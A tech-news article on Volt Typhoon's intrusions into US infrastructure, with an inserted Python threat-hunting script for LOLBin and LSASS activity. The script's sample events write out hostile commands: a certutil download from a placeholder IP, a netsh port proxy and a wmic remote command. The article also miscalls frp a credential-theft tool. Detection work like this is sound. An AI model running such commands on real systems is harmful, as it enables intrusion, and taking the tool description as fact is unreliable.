Microsoft: Chinese hackers (Volt Typhoon) breach US infrastructure

According to Microsoft, the Chinese state-sponsored group it tracks as Volt Typhoon has been targeting critical infrastructure organizations across the US, including Guam, since at least mid-2021.


Its victims span a wide range of critical sectors, including government, shipping, telecommunications, manufacturing, IT, utilities, construction and education.

The initial access vector is the compromise of internet-exposed Fortinet FortiGuard devices by exploiting an as yet unidentified zero-day vulnerability.

Once inside the target's network, the group relies on hands-on-keyboard activity and living-off-the-land binaries (LOLBins) such as PowerShell, Certutil, Netsh and the Windows Management Instrumentation Command Line (WMIC) to carry out what Microsoft describes as "living off the land" attacks, blending in with normal administrative activity.

A joint advisory released the same day by the FBI, NSA, CISA and the cyber security agencies of Australia, New Zealand, the UK and Canada adds that Fast Reverse Proxy (frp), a credential-theft tool, the Impacket networking framework and other open source tools have also been observed in these intrusions.

To evade detection, Volt Typhoon blends its malicious traffic with legitimate network traffic by routing it through compromised small office and home office (SOHO) network equipment, including ASUS, Cisco, D-Link, Netgear, FatPipe and Zyxel routers, firewalls and VPN devices.

Using the privileged access gained after a Fortinet device is compromised, the state-backed hackers attempt to dump credentials from the Local Security Authority Subsystem Service (LSASS) process.
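The two behaviours described above, LOLBins driven by hand and credential access against LSASS, are what a defender would hunt for in process telemetry. The following script is an added example (not code from the article, from Microsoft or from the advisory): it scans constructed Sysmon-style JSON events (Event ID 1 for process creation, Event ID 10 for process access) and flags the LOLBins the article names when their command lines carry suspicious fragments, and any non-allowlisted process that opens lsass.exe with memory-read rights. The command-line patterns, the allowlist and the sample events are assumptions chosen for illustration, not an official indicator list.

```python
"""Hunt for living-off-the-land binary use and LSASS credential access in
process events. Added example; not code from the article, Microsoft or CISA.
Input is constructed Sysmon-style JSON lines (EventID 1 = process creation,
EventID 10 = process access). Patterns and allowlist are assumptions."""
import json
import re

# LOLBins the article names, with command-line fragments that make a use of
# them worth a second look. Illustrative assumptions, not an official list.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "netsh.exe": re.compile(r"interface\s+portproxy|advfirewall", re.I),
    "wmic.exe": re.compile(r"/node:|process\s+call\s+create", re.I),
    "powershell.exe": re.compile(r"-enc(odedcommand)?\b|downloadstring|\biex\b", re.I),
}

# Sysmon EID 10 GrantedAccess bits that allow reading another process' memory:
# PROCESS_VM_READ (0x0010) and PROCESS_QUERY_INFORMATION (0x0400).
LSASS_READ_MASK = 0x0010 | 0x0400

# Assumed allowlist of source images that legitimately open LSASS with read
# access (e.g. an AV engine). Tune per environment; do not trust as-is.
LSASS_SOURCE_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_lolbin(event):
    """Return a reason string if an EID 1 event is a suspicious LOLBin use."""
    if event.get("EventID") != 1:
        return None
    image = basename(event.get("Image", ""))
    pattern = LOLBIN_PATTERNS.get(image)
    if pattern is None:
        return None
    match = pattern.search(event.get("CommandLine", ""))
    if match is None:
        return None
    return f"LOLBin {image} with '{match.group(0)}' in command line"


def flag_lsass_access(event):
    """Return a reason string if an EID 10 event reads LSASS memory from a
    source process that is not on the allowlist."""
    if event.get("EventID") != 10:
        return None
    if basename(event.get("TargetImage", "")) != "lsass.exe":
        return None
    source = event.get("SourceImage", "")
    if source.lower() in LSASS_SOURCE_ALLOWLIST:
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if (granted & LSASS_READ_MASK) == 0:
        return None
    return f"LSASS opened with read access {hex(granted)} by {source}"


def hunt(lines):
    """Parse JSON-lines events and return (EventID, reason) pairs for hits."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for check in (flag_lolbin, flag_lsass_access):
            reason = check(event)
            if reason:
                findings.append((event["EventID"], reason))
    return findings


# Constructed sample events (not real telemetry). Raw string so that the
# doubled backslashes reach the JSON parser intact.
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\netsh.exe", "CommandLine": "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.10.1.5 connectport=8443"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -urlcache -split -f http://203.0.113.7/a.txt a.txt"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic /node:fileserver01 process call create cmd.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell Get-Process"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -verify cert.cer"}
{"EventID": 10, "SourceImage": "C:\\Users\\svc\\AppData\\Local\\Temp\\d.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1fffff"}
""".splitlines()

if __name__ == "__main__":
    for event_id, reason in hunt(SAMPLE_LOG):
        print(f"EID {event_id}: {reason}")
```

Run against the sample, the script reports the netsh, certutil and wmic command lines and the LSASS access from the Temp-directory binary, while the benign PowerShell and certutil invocations and the Defender engine's LSASS access are left alone. The point of checking the GrantedAccess mask rather than just the target name is that many processes open LSASS with query-only rights; it is the memory-read bit that matters for credential dumping.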

The stolen credentials then allow them to deploy an Awen-based web shell for data exfiltration and persistence on the compromised systems.


According to Mandiant Intelligence chief analyst John Hultquist, these intrusions into US critical infrastructure organizations appear to be part of a concerted effort to secure access for China in the event of a future conflict between the two countries.

"There are many reasons for targeting critical infrastructure, but an unrelenting focus on these areas may indicate preparations for disruptive or destructive cyber attacks," said Hultquist.

"States conduct long-term intrusions into critical infrastructure to prepare for potential conflicts. Similar contingency intrusions are regularly carried out by states.

Over the past decade, Russia has targeted several critical infrastructure sectors in operations that were not designed for immediate effect. China has similarly targeted the oil and gas sector in the past. While these operations are aggressive and potentially dangerous, they do not necessarily indicate that an attack is imminent."

Microsoft said it followed its normal procedures and proactively contacted all customers targeted or compromised in these attacks, providing them with the information they needed to protect their networks from future breach attempts.

iGuRu.gr - The Best Technology Site in Greece


Written by Anastasis Vasileiadis

